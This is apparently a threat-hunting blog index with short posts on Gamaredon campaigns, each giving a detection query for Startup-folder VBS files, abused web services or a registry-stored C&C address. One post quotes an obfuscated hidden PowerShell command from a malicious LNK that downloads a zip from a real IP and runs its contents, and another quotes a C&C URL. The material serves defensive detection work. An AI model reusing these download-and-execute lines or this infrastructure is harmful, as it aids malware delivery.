Posts

Showing posts with the label gamaredon

393. Hunting for Recent Gamaredon Tactics, Techniques, and Procedures

Image
Hello everyone! Today we’ll take a look at several procedures observed in relatively recent Gamaredon (Disastrous Werewolf, Primitive Bear, Armageddon, Shuckworm, Aqua Blizzard) campaigns . As before, the attackers used phishing emails for initial access. The emails contained archives exploiting the CVE-2025-8088 vulnerability in WinRAR. After successful exploitation, a malicious VBS file - for example, 1_13_4_1882_18.03.2026.vbs  - was copied into %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ . We can search for suspicious VBS file creation events in this folder: event_type: "filecreatewin" AND file_path: ("programs\\startup" AND *.vbs) Next, the VBS file downloads a malicious HTA file from Cloudflare Workers. For example, we can look for wscript.exe communications with the corresponding domains: event_type: "dnsreqwin" AND dns_rname: "workers.dev" AND proc_file_path: "wscript.exe" The HTA file is downloaded into the %TEMP...

267. Hunting for PteroEffigy

Image
Hello everyone! Let's keep digging into the report on Gamaredon and Turla collaboration. This time we'll look at another Gamaredon's malware -  PteroEffigy . PteroEffigy is another PowerShell-based downloader, and it also abuses a legitimate web service. But unlike PteroGraphin, it leverages  api.gofile[.]io instead of telegra[.]ph . Of course, we can convert this knowledge into a hunting query: event_type: "dnsreqwin" AND dns_rname: "gofile.io" AND proc_file_name: "powershell.exe" See you tomorrow!

266. Hunting for PteroGraphin

Image
Hello everyone! ESET released a report on potential collaboration of two notorious threat actors: Gamaredon and Turla . So let's look at some hunting opportunities. According to the report, Turla leveraged Gamaredon's downloaders to deliver its own malware. Gamaredon's downloaders, for example,  PteroGraphin , are PowerShell-based and use  telegra[.]ph for storing the payloads, so it enables us to hunt for similar behaviors: event_type: "dnsreqwin" AND dns_rname: "telegra.ph" AND proc_file_name: "powershell.exe" See you tomorrow!

101. Gamaredon Hides C&C Server Address Under the Registry

Image
Hello everyone! In some case you can find a C&C server address under not so common places. For example, Windows registry. If we look through this report on Gamaredon's GammaSteel , we can see that the adversary does just this: IWshShell3.RegWrite("HKEY_CURRENT_USER\Console\WindowsUpdates", "http://172.104.187.254/mood/1/3/2025/confer.html?=[REMOVED]", "REG_SZ"); As you can see, it uses  "HKEY_CURRENT_USER\Console\WindowsUpdates" to store the C&C adress. It means we can search for its modifiction events: event_type: "registryvalueset" AND reg_key_path: "Console\\WindowsUpdates" Of course, this approach won't allow you to detect similar activity for a long time, so you can experiment with variations of key names as well as hunt for adding URLs to various registry keys. See you tomorrow!

090. Hunting for Gamaredon's PowerShell Abuse

Image
Hello everyone! We haven't talked about PowerShell abuse for some time, but I think we can continue. And Gamaredon will help us! The group continues to distribute malicious LNK files, which contain PowerShell code to download and execute the payload, and open the decoy document, for example : powershell.exe -WindowStyle hidden echo DsuXBGtDPVpafNQKWfGNQXRPehfejEMnZWqvtPFEKrDQRtLDoRtJCcMjEFenVKrryMHia; Write-HostZVRjgZrFwKSbjNrBtIujdNLLlPq; if (-not(Test-Path iscabv.''zi''p -PathType Leaf)){echo vgUYzpRfaoGxgCSuzlmZCRxmXRnGJKBwooBEEoJgvYqjRXoXTHaspGDtNMuMovanuZezIbSYgAmXMqDOLMczhxmvJtkBJPsVai; &(g''cm i******w*****r) -uri h''t''tp:''//''146''.''1''85''.''233''.''90''/iscabv.''zi''p -OutFile iscabv.''zi''p}; Expand-Archive -Path iscabv.''zi''p -DestinationPath Drvx64; star''t  Drvx64/IsCabView.''e...